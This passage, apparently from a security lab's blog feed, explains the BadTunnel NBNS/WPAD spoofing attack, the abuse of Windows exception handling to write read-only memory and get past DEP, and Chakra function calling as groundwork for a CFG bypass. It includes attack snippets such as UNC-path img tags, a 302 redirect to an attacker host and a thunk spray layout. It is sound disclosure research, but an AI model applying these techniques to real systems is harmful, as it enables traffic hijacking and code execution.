  3. How do we know when to send the NBNS spoofing packet, if a host outside the LAN cannot receive the NBNS NB query broadcast?

Fortunately, all these problems can be solved.

First, the Windows operating system only uses port 137/UDP for NBNS. “Only” means that the source and destination ports are always 137/UDP. If an intranet host 192.168.2.2 sends an NBNS request to 10.10.10.10, it looks like this:

192.168.2.2:137 -> NAT:54231 -> 10.10.10.10:137

The response from 10.10.10.10 will look like this:

192.168.2.2:137 <- NAT:54231 <- 10.10.10.10:137

That is, if the local firewall on 192.168.2.2, the NAT, or any other intermediate network device allows the query at all, it must also allow any UDP packet from 10.10.10.10:137 to 192.168.2.2:137 to pass through for a certain amount of time. This opens a bidirectional UDP tunnel, hence the name BadTunnel:

192.168.2.2:137 <-> NAT:54231 <-> 10.10.10.10:137

A quick experiment helps illustrate this tunnel:

Prepare two systems with the firewall enabled, with IP addresses set to 192.168.2.2 and 192.168.3.3, respectively.

On 192.168.2.2, execute the command “nbtstat -A 192.168.3.3”. It will fail.

On 192.168.3.3, execute the command “nbtstat -A 192.168.2.2”. It will succeed.

On 192.168.2.2, execute “nbtstat -A 192.168.3.3” once again. It will succeed.
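
The outcome of this experiment can be reproduced with a toy model of two stateful firewalls. This is a deliberately simplified sketch: the class and function names are made up, flow state never times out, and a firewall is assumed to admit inbound UDP only from a remote address and port that the host has already sent to.

```python
NBNS_PORT = 137


class Host:
    """Toy host whose firewall only admits UDP from endpoints it has sent to."""

    def __init__(self, ip):
        self.ip = ip
        self.open_flows = set()  # remote (ip, port) pairs with outbound state

    def send(self, peer):
        # Source and destination ports are both 137, so sending opens the return path.
        self.open_flows.add((peer.ip, NBNS_PORT))
        return peer.accepts(self)

    def accepts(self, sender):
        return (sender.ip, NBNS_PORT) in self.open_flows


def nbtstat(client, server):
    """A query succeeds only if the request and the reply both get through."""
    if not client.send(server):
        return False
    return server.send(client)


a = Host("192.168.2.2")
b = Host("192.168.3.3")
# Same order as the experiment: a queries b, b queries a, a queries b again.
results = [nbtstat(a, b), nbtstat(b, a), nbtstat(a, b)]
print(results)
```

The first query fails but still leaves outbound state on 192.168.2.2, which is what lets the later queries through.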

How can we make 192.168.2.2 send an NBNS request to 10.10.10.10? When Windows tries to access a file URI or UNC path that contains an IP address, and ports 139 and 445 of the target are inaccessible (the connection either times out or is reset), the system sends an NBNS NBSTAT query to this IP address. There are numerous ways to make a system access a file URI or UNC path.

Microsoft Edge and Internet Explorer both try to resolve a file URI or UNC path in a web page:

<img src="\\10.10.10.10\BadTunnel">

All types of Microsoft Office documents can embed a file URI or UNC path, and the same is true for many third-party document types.

If a shortcut has an icon path that points to a UNC path, this UNC path is accessed as soon as the shortcut is shown on the screen.

If the target is a web server, a single HTTP request may be enough:

http://web.server/reader.aspx?ID=\\10.10.10.10\BadTunnel

The NBNS Transaction ID is not random but incremental. As noted previously, NBNS sends an NBNS NB query when resolving a name, and the system sends an NBNS NBSTAT query when it fails to access a file URI or UNC path. NBNS NB queries and NBNS NBSTAT queries not only use the same 137/UDP port, but also share the same Transaction ID counter. That is, when 192.168.2.2 fails to access \\10.10.10.10\BadTunnel, the NBNS NBSTAT query it sends to 10.10.10.10 not only opens a bidirectional UDP tunnel, but also leaks the current Transaction ID value to 10.10.10.10.
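
To make the leak concrete, the sketch below parses the 12-byte header of an NBNS query as laid out in RFC 1002 and reads the Transaction ID from it. The function names and the sample packet are made up, and the +1 step is an assumption: the text above only says the counter is incremental.

```python
import struct

NB, NBSTAT = 0x0020, 0x0021  # question types defined in RFC 1002


def parse_nbns_query(packet):
    """Return (transaction_id, question_type) from a single-question NBNS query."""
    txid, _flags, _qd, _an, _ns, _ar = struct.unpack(">6H", packet[:12])
    name_len = packet[12]                  # 0x20 for a first-level encoded name
    qtype_off = 12 + 1 + name_len + 1      # length byte + name + terminating zero
    qtype, _qclass = struct.unpack(">2H", packet[qtype_off:qtype_off + 4])
    return txid, qtype


def next_transaction_id(observed):
    """Assumed counter behaviour: plus one per query, wrapping at 16 bits."""
    return (observed + 1) & 0xFFFF


# Hand-built NBSTAT query for the wildcard name "*" with a hypothetical ID 0x1234.
sample = (struct.pack(">6H", 0x1234, 0, 1, 0, 0, 0)
          + b"\x20" + b"CK" + b"A" * 30 + b"\x00"
          + struct.pack(">2H", NBSTAT, 1))
txid, qtype = parse_nbns_query(sample)
print(hex(txid), hex(qtype), hex(next_transaction_id(txid)))
```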

That is, a single NBNS NBSTAT query solves both problems 1 and 2. The third problem is even easier to solve. Just as we can embed <img src="\\10.10.10.10\BadTunnel"> in our web page, we can also embed:

<img src="http://WPAD/wpad.dat">

In this way, we control when the system sends the NBNS NB query for WPAD, so we can send our response in time. The system then caches the response to http://WPAD/wpad.dat in its web cache. Later, when the system requests http://WPAD/wpad.dat to set the proxy configuration, it retrieves the file from the web cache. At least on Windows 7, the spoofed http://WPAD/wpad.dat persists across reboots, just like other cached web resources.

Even if the web cache is not in play, NBNS has its own caching mechanism. After one successful NBNS spoofing, the spoofed response is cached for 10 minutes.

In the next 10 minutes the operating system itself will also try to resolve the WPAD name and access http://WPAD/wpad.dat to download the proxy configuration, so it will get the spoofed response. Once the attacker has successfully hijacked the user’s network traffic, the attacker can periodically redirect certain HTTP requests to make the BadTunnel attack persistent:

HTTP/1.1 302 Found
Content-Type: text/html
Location: file://10.10.10.10/BadTunnel
Content-Length: 0

0x02 Conclusion

The BadTunnel attack described in this article is a serious security problem, and its root cause is not obvious. The following conditions are all required for the attack to succeed:

  1. UDP is connectionless.
  2. Broadcast requests can accept responses from outside the network segment.
  3. WPAD is enabled by default on Windows.
  4. Windows file APIs support UNC paths by default.
  5. When Windows fails to access a UNC path by connecting to ports 139 and 445, it performs an NBNS NBSTAT query.
  6. NBNS always uses the same port on the client and server side.
  7. The NBNS Transaction ID uses a counter rather than an RNG.
  8. NBNS NBSTAT queries and NBNS NB queries share the same counter.
  9. WPAD shares the same web and NBNS caches with other applications in the system.

None of these design decisions seems to be a problem on its own; some are even required. We certainly cannot blame UDP for being connectionless. Even though the NBNS Transaction ID is not randomly generated, this alone does not constitute a security vulnerability: the NBNS NB mechanism was designed for the intranet, where any host can receive the NBNS NB query broadcast packets anyway. However, although each design is harmless in isolation, together they become a massive vulnerability. How can we find the next BadTunnel?

0x03 Mitigation Recommendations

Even if the MS16-063 and MS16-077 patches cannot be installed immediately, there are workarounds that stop the BadTunnel attack.

Enterprises can drop 137/UDP packets on perimeter firewalls.

End users who do not need to access Windows network sharing services can disable NetBIOS over TCP/IP.

For minimal compatibility impact, the WPAD address can be pinned to 127.0.0.1 in %SystemRoot%\System32\drivers\etc\hosts, or automatic proxy discovery can be disabled to prevent hijacking.

However, BadTunnel is not limited to WPAD, and this does not stop the hijacking of other names.

0x04 A Little Disappointment

Using BadTunnel to hijack WPAD is possibly the Windows vulnerability with the widest impact and the most exploit channels in history. It is also the only vulnerability that can target all versions of Windows with one exploit. It could have been more interesting.

Apple’s Mac OS also implements NetBIOS and supports UNC paths in some cases. WPAD can also be manually enabled on it. However, due to differences in the implementation details of the NetBIOS protocol, this attack does not affect Mac OS. It would be much cooler otherwise.

0x05 References

[1] Evilgrade
https://github.com/infobyte/evilgrade/

[2] 10 Places to Stick Your UNC Path
https://blog.netspi.com/10-places-to-stick-your-unc-path/

[3] Web Proxy Auto-Discovery Protocol
http://tools.ietf.org/html/draft-ietf-wrec-wpad-01

[4] NetBIOS Over TCP/IP
https://technet.microsoft.com/en-us/library/cc940063.aspx

[5] Disable WINS/NetBT name resolution
https://technet.microsoft.com/en-us/library/cc782733(v=ws.10).aspx

[6] MS99-054, CVE-1999-0858
https://technet.microsoft.com/en-us/library/security/ms99-054.aspx

[7] MS09-008, CVE-2009-0093, CVE-2009-0094
https://technet.microsoft.com/en-us/library/security/ms09-008.aspx

[8] MS12-074, CVE-2012-4776
https://technet.microsoft.com/en-us/library/security/ms12-074.aspx

[9] MS16-063, CVE-2016-3213
https://technet.microsoft.com/en-us/library/security/ms16-063.aspx

[10] MS16-077, CVE-2016-3213, CVE-2016-3236
https://technet.microsoft.com/en-us/library/security/ms16-077.aspx

]]>
Exceptions in Exceptions – Abusing Special Cases in System Exception Handling to Achieve Unbelievable Vulnerability Exploitation http://xlab.tencent.com/en/2016/04/19/exception-in-exception/ Tue, 19 Apr 2016 08:21:21 +0000 http://xlab.tencent.com/en/?p=86 Continue reading "Exceptions in Exceptions – Abusing Special Cases in System Exception Handling to Achieve Unbelievable Vulnerability Exploitation"]]>

Memory read / write / execute attributes are among the most important parts of system security. Usually the writable attribute must be set before a block of memory can be overwritten, and the executable attribute must be set before code in a block of memory can be executed; otherwise an exception is generated. However, there are some special cases in the Windows exception handling procedure that we can take advantage of. By abusing such exceptions, we could write to the unwritable, and execute the unexecutable.

0x01 Directly modify read-only memory locations

In my CanSecWest 2014 talk “ROPs are for the 99%” I introduced an interesting technique: by modifying a flag in JavaScript objects, we can disable safe mode and let Internet Explorer (IE) load dangerous objects such as WScript.Shell, and execute arbitrary code without worrying about DEP.

Modifying the SafeMode flag isn’t the only way to let IE load dangerous objects.

Some parts of IE are actually implemented in HTML. This HTML code is usually stored in the resource section of ieframe.dll. For example, the print preview page is in res://ieframe.dll/preview.dlg, the organize favorites page is in res://ieframe.dll/orgfav.dlg, the page properties page is in res://ieframe.dll/docppg.ppg, and so on.

IE creates separate renderer and JavaScript engine instances for these HTML pages, and SafeMode is disabled by default in these new JavaScript engine instances.

Therefore, we only need to insert our JavaScript code into the resource section of ieframe.dll and trigger the corresponding IE functionality. The code will then be executed as if it were part of that IE functionality, in a JavaScript engine instance with SafeMode disabled.

But the resource section of the PE file is read-only. If we use a write-what-where vulnerability to modify the resource of ieframe.dll, an access violation exception is generated:

eax=00000041 ebx=1e2e31b0 ecx=00000000 edx=00000083 esi=1e2e31b0 edi=68b77fe5
eip=69c6585f esp=0363ac00 ebp=0363ac84 iopl=0         nv up ei pl nz na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010207
jscript9!Js::JavascriptOperators::OP_SetElementI+0x117:
69c6585f 88040f          mov     byte ptr [edi+ecx],al      ds:002b:68b77fe5=76
0:008> !exchain
0363b0f0: jscript9!DListBase<CustomHeap::Page>::DListBase<CustomHeap::Page>+1570 (69b421d1)
0363b648: jscript9!DListBase<CustomHeap::Page>::DListBase<CustomHeap::Page>+1570 (69b421d1)
0363bab8: jscript9!DListBase<CustomHeap::Page>::DListBase<CustomHeap::Page>+1570 (69b421d1)
0363bb78: jscript9!DListBase<CustomHeap::Page>::DListBase<CustomHeap::Page>+28c0 (69c71564)
0363bbc0: jscript9!DListBase<CustomHeap::Page>::DListBase<CustomHeap::Page>+2898 (69c7150f)
0363bc44: jscript9!DListBase<CustomHeap::Page>::DListBase<CustomHeap::Page>+276a (69d0dedd)
0363c588: MSHTML!_except_handler4+0 (66495fa4)
  CRT scope  0, filter: MSHTML! ... Omitted... (6652bbe8) 
                func:   MSHTML!... Omitted... (6652bbf1)
0363c62c: user32!_except_handler4+0 (7569a61e)
  CRT scope  0, func:   user32!UserCallWinProcCheckWow+123 (75664456)
0363c68c: user32!_except_handler4+0 (7569a61e)
  CRT scope  0, filter: user32!DispatchMessageWorker+15e (756659b7)
                func:   user32!DispatchMessageWorker+171 (756659ca)
0363f9a8: ntdll!_except_handler4+0 (776a71f5)
  CRT scope  0, filter: ntdll!__RtlUserThreadStart+2e (776a74d0)
                func:   ntdll!__RtlUserThreadStart+63 (776a90eb)
0363f9c8: ntdll!FinalExceptionHandler+0 (776f7428)

In the above exception handler chain, the exception handler in mshtml.dll will call kernel32!RaiseFailFastException(). If g_fFailFastHandlerDisabled is set to false, the process will be terminated:

int __thiscall RaiseFailFastExceptionFilter(int this) {
  signed int **v1; // esi@1
  CONTEXT *v2; // ST04_4@2
  signed int v3; // eax@2
  UINT v4; // ST08_4@4
  HANDLE v5; // eax@4

  v1 = (signed int **)this;
  if ( !g_fFailFastHandlerDisabled )
  {
    v2 = *(CONTEXT **)(this + 4);
    g_fFailFastHandlerDisabled = 1;
    RaiseFailFastException(*(PEXCEPTION_RECORD *)this, v2, 2u);
    v3 = 1653;
    if ( *v1 )
      v3 = **v1;
    v4 = v3;
    v5 = GetCurrentProcess();
    TerminateProcess(v5, v4);
  }
  return 0;
}

However, if g_fFailFastHandlerDisabled is set to true, the exception handling chain will call into kernel32!UnhandledExceptionFilter(), and finally kernel32!CheckForReadOnlyResourceFilter():

int __stdcall CheckForReadOnlyResourceFilter(int a1) {
  int result; // eax@2

  if ( BasepAllowResourceConversion )
    result = CheckForReadOnlyResource(a1, 0);
  else
    result = 0;
  return result;
}

If BasepAllowResourceConversion is also true, CheckForReadOnlyResource() will set the target page to writable, and return normally.

That is, if we first set both the g_fFailFastHandlerDisabled and BasepAllowResourceConversion flags to true, we can then directly modify the resources in ieframe.dll without worrying about the read-only attribute. The operating system will take care of it for us.
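The interplay of the two flags can be summarized with a small model. This is only a sketch of the decision logic described above: the function and enumerator names are hypothetical, and nothing here calls or reproduces the real Windows routines.

```cpp
#include <cassert>

// Possible outcomes of a write fault on a read-only resource page.
enum class FaultOutcome {
    ProcessTerminated,  // the mshtml filter raises a fail-fast exception and terminates
    PageMadeWritable,   // CheckForReadOnlyResource makes the page writable
    Unhandled           // no filter resolves the fault
};

// Simplified model. The parameters mirror the two globals named in the text;
// the function itself is hypothetical.
FaultOutcome handleResourceWriteFault(bool failFastHandlerDisabled,
                                      bool allowResourceConversion) {
    if (!failFastHandlerDisabled) {
        return FaultOutcome::ProcessTerminated;
    }
    // The chain continues to UnhandledExceptionFilter and then to
    // CheckForReadOnlyResourceFilter.
    if (allowResourceConversion) {
        return FaultOutcome::PageMadeWritable;
    }
    return FaultOutcome::Unhandled;
}
```

Only the combination with both flags set leads to the page being made writable, which is why both must be modified before the resource is touched.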

There is another small obstacle. Once the page attribute modification is triggered in CheckForReadOnlyResource(), the RegionSize of the memory region also changes to one page, usually 0x1000. Before IE creates renderer instances from the HTML resources in ieframe.dll, mshtml!GetResource() checks whether RegionSize is larger than the size of the resource, and fails otherwise. The solution is to overwrite the resource completely from start to end; RegionSize increases accordingly and the check is bypassed.
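The RegionSize obstacle can be illustrated with a little arithmetic. The sketch below assumes that the resource starts on a page boundary and that every page touched by the overwrite becomes part of one contiguous writable region; both function names are hypothetical, and the exact comparison used by mshtml!GetResource() is not known here, so a simple "region covers the resource" test stands in for it.

```cpp
#include <cassert>
#include <cstddef>

constexpr std::size_t kPageSize = 0x1000;  // typical page size, as in the text

// Size of the writable region at the resource base after the first
// `bytesOverwritten` bytes have been written (assumes a page-aligned start).
std::size_t writableRegionSize(std::size_t bytesOverwritten) {
    if (bytesOverwritten == 0) {
        return 0;
    }
    std::size_t pages = (bytesOverwritten + kPageSize - 1) / kPageSize;
    return pages * kPageSize;
}

// Hypothetical stand-in for the size check attributed to mshtml!GetResource().
bool resourceCheckPasses(std::size_t regionSize, std::size_t resourceSize) {
    return regionSize >= resourceSize;
}
```

For a resource of 0x2800 bytes, patching only the first bytes leaves a region of 0x1000 and the check fails, while overwriting all 0x2800 bytes yields a region of 0x3000 and the check passes.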

We now have a surreal exploit, thanks to the special case for the PE resource section in Windows write exception handling.

0x02 Executing the unexecutable memory locations

In my VARA 2009 talk “Time Factors in Vulnerability Hunting” I introduced a rare kind of vulnerability: use-after-free of a module address. For example, thread A calls a function in module X, and module X in turn calls a time-consuming function in module Y. If thread B unloads module X before that function call returns, the return address is invalid by the time the call returns. I found such problems in the Flash module of the Opera browser at that time. One of the download managers also had similar problems.

Some other vulnerability categories exhibit similar properties: execution is possible but the address is not controllable. In environments without DEP, these kinds of vulnerabilities are not hard to exploit, since we only need to spray code to the target address. But with DEP enabled, these vulnerabilities are usually considered unexploitable.

But if we spray the target address with the following data:

typedef struct _THUNK3 {
    UCHAR MovEdx;       // 0xba         mov edx, imm32
    LONG EdxImmediate; 
    UCHAR MovEcx;       // 0xb9         mov ecx, imm32
    LONG EcxImmediate; // <- put your Stack Pivot here
    USHORT JmpEcx;      // 0xe1ff       jmp ecx
} Thunk3;

With DEP enabled, the target memory location is certainly not executable, but surprisingly the system still appears to execute these instructions and jump to the location in ecx. We only need to set ecx to make it jump to an arbitrary memory location and execute the ROP chain.

For compatibility reasons, Windows implements a mechanism called ATL thunk emulation. When the Windows kernel handles an execution exception, it checks whether the code at the exception address looks like an ATL thunk. If so, the kernel emulates its execution with the KiEmulateAtlThunk() routine.
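To make the byte pattern concrete, the following sketch builds the 12 bytes described by the THUNK3 layout and recognizes them again. It writes the bytes directly because the struct as printed would need 1-byte packing to occupy exactly 12 bytes. Both helper names are hypothetical; the matcher only illustrates the idea of pattern recognition and is not the kernel routine.

```cpp
#include <array>
#include <cassert>
#include <cstddef>
#include <cstdint>

// Byte layout of the pattern: BA imm32, B9 imm32, FF E1 (12 bytes in total).
std::array<std::uint8_t, 12> makeThunk3(std::uint32_t edxImm, std::uint32_t ecxImm) {
    std::array<std::uint8_t, 12> t{};
    t[0] = 0xBA;                       // mov edx, imm32
    t[5] = 0xB9;                       // mov ecx, imm32
    for (int i = 0; i < 4; ++i) {      // immediates are stored little-endian
        t[1 + i] = static_cast<std::uint8_t>(edxImm >> (8 * i));
        t[6 + i] = static_cast<std::uint8_t>(ecxImm >> (8 * i));
    }
    t[10] = 0xFF;                      // jmp ecx (the USHORT 0xe1ff in memory order)
    t[11] = 0xE1;
    return t;
}

// If the bytes match the pattern, stores the jump target (the ecx immediate)
// in `target` and returns true. Hypothetical helper for illustration only.
bool matchThunk3(const std::uint8_t* p, std::size_t n, std::uint32_t& target) {
    if (n < 12 || p[0] != 0xBA || p[5] != 0xB9 || p[10] != 0xFF || p[11] != 0xE1) {
        return false;
    }
    target = 0;
    for (int i = 0; i < 4; ++i) {
        target |= static_cast<std::uint32_t>(p[6 + i]) << (8 * i);
    }
    return true;
}
```

The value passed as ecxImm is where the stack pivot address would go, since that is the address the emulated jmp ecx transfers control to.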

There are some limitations. ATL thunk emulation checks whether the target address is within a PE file, and CFG checks are also enforced on supported systems. Since Windows Vista, ATL thunk emulation only applies to applications compiled without IMAGE_DLLCHARACTERISTICS_NX_COMPAT under the default DEP policy. If /NXCOMPAT is specified at build time, ATL thunk emulation is no longer supported. But there are still a lot of programs that do support ATL thunk emulation, including many third-party applications and 32-bit iexplore.exe. A vulnerability such as CVE-2015-2425, found in the leaked Hacking Team emails, is also exploitable with this technique if a heap spray succeeds.
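Whether a given image has opted in can be read from the DllCharacteristics field of its PE optional header. The sketch below only shows the bit test; parsing the PE header to obtain the field is left out, and the helper name is hypothetical.

```cpp
#include <cassert>
#include <cstdint>

// Value of IMAGE_DLLCHARACTERISTICS_NX_COMPAT in the PE optional header.
constexpr std::uint16_t kNxCompat = 0x0100;

// True if the image was built with /NXCOMPAT. Per the text, ATL thunk
// emulation is then not available under the default DEP policy.
bool isNxCompat(std::uint16_t dllCharacteristics) {
    return (dllCharacteristics & kNxCompat) != 0;
}
```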

By abusing ATL thunk emulation in the system exception handling procedure, we make the unexecutable executable again, and bring some unexploitable vulnerabilities back to life.

The majority of this article was written in October 2014. Module addresses and symbol information were from Windows Technical Preview 6.4.9841 x64 with Internet Explorer 11.

References:

[1] ROPs are for the 99%, CanSecWest 2014, Yang Yu
[2] Bypassing Browser Memory Protections
[3] (CVE-2015-2425) “Gifts” From Hacking Team Continue, IE Zero-Day Added to Mix
[4] Time Factors in Vulnerability Hunting, VARA 2009

]]>
Use Chakra engine again to bypass CFG http://xlab.tencent.com/en/2016/01/04/use-chakra-engine-again-to-bypass-cfg/ Mon, 04 Jan 2016 08:19:56 +0000 http://xlab.tencent.com/en/?p=84 Continue reading "Use Chakra engine again to bypass CFG"]]>

This post was initially inspired by a talk with @TK, during which I learned the process and details of how to successfully bypass CFG (reference: use Chakra JIT to bypass DEP and CFG). Being interested in the technique, I spent some time reading related materials and found another place where CFG can be bypassed. I would like to thank @TK for enlightening me on the ideas and techniques mentioned in this post.

There are plenty of articles that focus on the analysis of CFG. If you are interested, you may refer to my previous talk at HitCon 2015 (《spartan 0day & exploit》). To be clear, this post covers the part that was not revealed in that talk. With it, the method for achieving arbitrary code execution on Edge through a memory write is completely revealed.

0x01 The function calling logic of Chakra

When the chakra engine calls a function, it processes the call differently depending on the state of the function: for example, a function called for the first time, a function called multiple times, a DOM interface function, or a function compiled by jit. Different types of functions have different processing flows, but all of them go through the Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > > function, which calls the Js::JavascriptFunction::CallFunction<1> function.

1. The first call and subsequent calls of a function

When the following script is called, the function Js::JavascriptFunction::CallFunction<1> will be called by Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > >.

function test(){}

test();

If the function is called for the first time, the execution flow will be:

chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > >
    |-chakra!Js::JavascriptFunction::CallFunction<1>
        |-chakra!Js::JavascriptFunction::DeferredParsingThunk
            |-chakra!Js::JavascriptFunction::DeferredParse
            |-chakra!NativeCodeGenerator::CheckCodeGenThunk
                |-chakra!Js::InterpreterStackFrame::DelayDynamicInterpreterThunk
                    |-jmp_code
                        |-chakra!Js::InterpreterStackFrame::InterpreterThunk

If the function is called again, the calling process will be:

chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > >
    |-chakra!Js::JavascriptFunction::CallFunction<1>
        |-chakra!NativeCodeGenerator::CheckCodeGenThunk
            |-chakra!Js::InterpreterStackFrame::DelayDynamicInterpreterThunk
                |-jmp_code
                    |-chakra!Js::InterpreterStackFrame::InterpreterThunk

These two calling flows are almost identical. The main difference is that when the function is called for the first time, the DeferredParsingThunk function has to parse it first; deferring the parsing until the first call is done for efficiency. Subsequent calls execute the function directly.

Analysis shows that the sub function called by Js::JavascriptFunction::CallFunction<1> is obtained from data in the Js::ScriptFunction object. The functions called next, Js::JavascriptFunction::DeferredParsingThunk and NativeCodeGenerator::CheckCodeGenThunk, are both stored in the Js::ScriptFunction object. Here is how Js::ScriptFunction differs between the two calls.

The object Js::ScriptFunction called the first time:

0:010> u poi(06eaf050 )
chakra!Js::ScriptFunction::`vftable':

0:010> dd 06eaf050 
06eaf050  5f695580 06eaf080 00000000 00000000

0:010> dd poi(06eaf050+4) 
06eaf080  00000012 00000000 06e26c00 06e1fea0
06eaf090  5f8db3f0 00000000 5fb0b454 00000101

0:010> u poi(poi(06eaf050+4)+0x10)
chakra!Js::JavascriptFunction::DeferredParsingThunk:

The object Js::ScriptFunction called the second time:

0:010> u poi(06eaf050 )
chakra!Js::ScriptFunction::`vftable':

0:010> dd 06eaf050 
06eaf050  5f695580 1ce1a0c0 00000000 00000000

0:010> dd poi(06eaf050+4)
1ce1a0c0  00000012 00000000 06e26c00 06e1fea0
1ce1a0d0  5f8db9e0 00000000 5fb0b454 00000101

0:010> u poi(poi(06eaf050+4)+0x10)
chakra!NativeCodeGenerator::CheckCodeGenThunk:

So the differences between the first call and the subsequent calls are achieved by changing the function pointer in the Js::ScriptFunction object.
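The pointer swap can be modelled in a few lines. This is a deliberately reduced sketch: the struct and function names are hypothetical stand-ins that only borrow the names from the call stacks above, and the real objects hold the pointer one level deeper, at offset 0x10 of the structure referenced from the object.

```cpp
#include <cassert>
#include <string>
#include <vector>

struct ScriptFunctionModel;
using EntryPoint = void (*)(ScriptFunctionModel&);

// Hypothetical stand-in for a Js::ScriptFunction: only the entry-point slot
// and a trace of what ran are modelled.
struct ScriptFunctionModel {
    EntryPoint entry;
    std::vector<std::string> trace;
};

void checkCodeGenThunk(ScriptFunctionModel& f) {
    f.trace.push_back("CheckCodeGenThunk");
}

void deferredParsingThunk(ScriptFunctionModel& f) {
    f.trace.push_back("DeferredParsingThunk");
    f.entry = checkCodeGenThunk;  // parsing is done: later calls skip this thunk
    f.entry(f);                   // continue into the newly installed entry point
}

// Models CallFunction<1>: it simply calls through whatever pointer is stored.
void callFunction(ScriptFunctionModel& f) {
    f.entry(f);
}
```

Calling callFunction twice on an object that starts with deferredParsingThunk runs the parsing thunk only once, which mirrors the two call stacks shown earlier.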

2. Jit of the function

Next we’ll look at the jit of the function. Here is the test script, which triggers jit by calling the test1 function multiple times.

function test1(num)
{
    return num + 1 + 2 + 3;
}

//trigger jit

test1(1);

The Js::ScriptFunction object that goes through jit.

//new debug, the memory address of the object will be different

0:010> u poi(07103050 )
chakra!Js::ScriptFunction::`vftable':

0:010> dd 07103050 
07103050  5f695580 1d7280c0 00000000 00000000

0:010> dd poi(07103050+4)
1d7280c0  00000012 00000000 07076c00 071080a0
1d7280d0  0a510600 00000000 5fb0b454 00000101

0:010> u poi(poi(07103050+4)+0x10)          //jit code
0a510600 55              push    ebp
0a510601 8bec            mov     ebp,esp
0a510603 81fc5cc9d005    cmp     esp,5D0C95Ch
0a510609 7f21            jg      0a51062c
0a51060b 6a00            push    0
0a51060d 6a00            push    0
0a51060f 68d0121b04      push    41B12D0h
0a510614 685c090000      push    95Ch
0a510619 e802955b55      call    chakra!ThreadContext::ProbeCurrentStack2 (5fac9b20)
0a51061e 0f1f4000        nop     dword ptr [eax]
0a510622 0f1f4000        nop     dword ptr [eax]
0a510626 0f1f4000        nop     dword ptr [eax]
0a51062a 6690            xchg    ax,ax
0a51062c 6a00            push    0
0a51062e 8d6424ec        lea     esp,[esp-14h]
0a510632 56              push    esi
0a510633 53              push    ebx
0a510634 b8488e0607      mov     eax,7068E48h
0a510639 8038ff          cmp     byte ptr [eax],0FFh
0a51063c 7402            je      0a510640
0a51063e fe00            inc     byte ptr [eax]
0a510640 8b450c          mov     eax,dword ptr [ebp+0Ch]
0a510643 25ffffff08      and     eax,8FFFFFFh
0a510648 0fbaf01b        btr     eax,1Bh
0a51064c 83d802          sbb     eax,2
0a51064f 7c2f            jl      0a510680
0a510651 8b5d14          mov     ebx,dword ptr [ebp+14h] //ebx = num
0a510654 8bc3            mov     eax,ebx        //eax = tagged num, i.e. (num << 1) | 1
0a510656 d1f8            sar     eax,1          //eax = num >> 1
0a510658 732f            jae     0a510689
0a51065a 8bf0            mov     esi,eax
0a51065c 8bc6            mov     eax,esi
0a51065e 40              inc     eax            //num + 1
0a51065f 7040            jo      0a5106a1
0a510661 8bc8            mov     ecx,eax
0a510663 83c102          add     ecx,2          //num + 2
0a510666 7045            jo      0a5106ad
0a510668 8bc1            mov     eax,ecx
0a51066a 83c003          add     eax,3          //num + 3
0a51066d 704a            jo      0a5106b9
0a51066f 8bc8            mov     ecx,eax
0a510671 d1e1            shl     ecx,1          //ecx = num << 1
0a510673 7050            jo      0a5106c5
0a510675 41              inc     ecx            //ecx = (result << 1) | 1, set the tag bit again
0a510676 8bd9            mov     ebx,ecx
0a510678 8bc3            mov     eax,ebx
0a51067a 5b              pop     ebx
0a51067b 5e              pop     esi
0a51067c 8be5            mov     esp,ebp
0a51067e 5d              pop     ebp
0a51067f c3              ret

After jit, the pointer to NativeCodeGenerator::CheckCodeGenThunk in the Js::ScriptFunction object is replaced with a pointer to the jit code, so the call goes directly to the jit code.

Simply put, when an integer parameter is passed to the function, it is first shifted left by one bit and the lowest bit is set to 1 (parameter = (num << 1) | 1). So the first thing to do after getting the parameter is to shift it right by one bit to recover the original value. As for why, I suppose it is because of the garbage collection mechanism of the script engine, which distinguishes objects from data by the lowest bit.
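The encoding can be written out as a short sketch. The helper names are hypothetical, and the model ignores the overflow bailouts (the jo branches) that the real jit code contains. It also relies on the arithmetic right shift of negative values that mainstream compilers provide, matching the sar instruction in the listing.

```cpp
#include <cassert>
#include <cstdint>

// Tagged-integer encoding: the value shifted left by one, lowest bit set.
std::int32_t tagInt(std::int32_t value) {
    return static_cast<std::int32_t>((static_cast<std::uint32_t>(value) << 1) | 1u);
}

// A raw value with the lowest bit set is an integer, otherwise an object pointer.
bool isTaggedInt(std::int32_t raw) {
    return (raw & 1) != 0;
}

std::int32_t untagInt(std::int32_t raw) {
    assert(isTaggedInt(raw));
    return raw >> 1;  // arithmetic shift, like `sar eax,1`
}

// What the jit code for test1 computes: untag, add 1 + 2 + 3, tag again.
std::int32_t test1Model(std::int32_t rawArg) {
    std::int32_t num = untagInt(rawArg);
    return tagInt(num + 1 + 2 + 3);
}
```

For the call test1(1), the raw argument is 3 and the raw return value is 15, which decodes to 7.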

chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > >
    |-chakra!Js::JavascriptFunction::CallFunction<1>
        |-jit code

When the jit function is called, the call stack is as shown above. This is how the chakra engine calls a jit function.

3. DOM interface function

To cover everything, there is another kind of function to mention: the DOM interface function, a function provided by another engine, such as the rendering engine (theoretically it can be other engines as well).

document.createElement("button");

On execution, the above script goes through the following calling process until it reaches the engine that provides the interface function.

chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > >
    |-chakra!Js::JavascriptFunction::CallFunction<1>
        |-chakra!Js::JavascriptExternalFunction::ExternalFunctionThunk //call dom interface function
            |-dom_interface_function    //EDGEHTML!CFastDOM::CDocument::Trampoline_createElement

When an interface function is called, the function object used by Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > > and the subsequent process differs from the ones used previously: it is a Js::JavascriptExternalFunction object. Then, similar to the previous function calls, the function pointer is resolved from the object and called, and finally execution enters the wanted DOM interface function.

